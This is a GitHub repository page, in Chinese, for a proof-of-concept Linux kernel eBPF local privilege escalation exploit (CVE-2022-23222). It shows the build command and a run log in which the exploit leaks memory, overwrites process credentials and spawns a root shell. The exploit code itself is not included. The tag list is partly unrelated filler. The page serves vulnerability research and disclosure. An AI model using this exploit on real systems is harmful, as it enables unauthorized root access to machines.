tr3ee/CVE-2022-23222
GitHub: tr3ee/CVE-2022-23222
Linux 内核 eBPF 本地提权漏洞 CVE-2022-23222 的概念验证代码,可从普通用户提升至 root 权限。
Stars: 579 | Forks: 99
# CVE-2022-23222
中文 writeup: https://tr3e.ee/posts/cve-2022-23222-linux-kernel-ebpf-lpe.txt
仅供教育/研究目的。使用风险自负。
## 构建与运行
```
$ make
cc -I include -static -w -o exploit exploit.c
$ ./exploit
[*] phase(1/8) 'create bpf map(s)' running
[+] phase(1/8) 'create bpf map(s)' done
[*] phase(2/8) 'do some leak' running
[+] phase(2/8) 'do some leak' done
[*] phase(3/8) 'prepare arbitrary rw' running
[+] phase(3/8) 'prepare arbitrary rw' done
[*] phase(4/8) 'spawn processes' running
[+] phase(4/8) 'spawn processes' done
[*] phase(5/8) 'find cred (slow)' running
[+] phase(5/8) 'find cred (slow)' done
[*] phase(6/8) 'overwrite cred' running
[+] phase(6/8) 'overwrite cred' done
[*] phase(7/8) 'spawn root shell' running
[+] Enjoy root!
# id
uid=0(root) gid=0(root) groups=65534(nobody)
# 退出
[+] phase(7/8) 'spawn root shell' done
[*] phase(8/8) 'clean up the mess' running
[+] phase(8/8) 'clean up the mess' done
```
标签:0day挖掘, cred结构体, CVE-2022-23222, Cybersecurity, Docker镜像, eBPF提权, Exploit, Linux内核漏洞, PoC, Rootkit, Web报告查看器, Zeek, 任意读写, 内核安全, 子域名枚举, 安全渗透, 客户端加密, 客户端加密, 提权漏洞, 暴力破解, 本地权限提升, 系统安全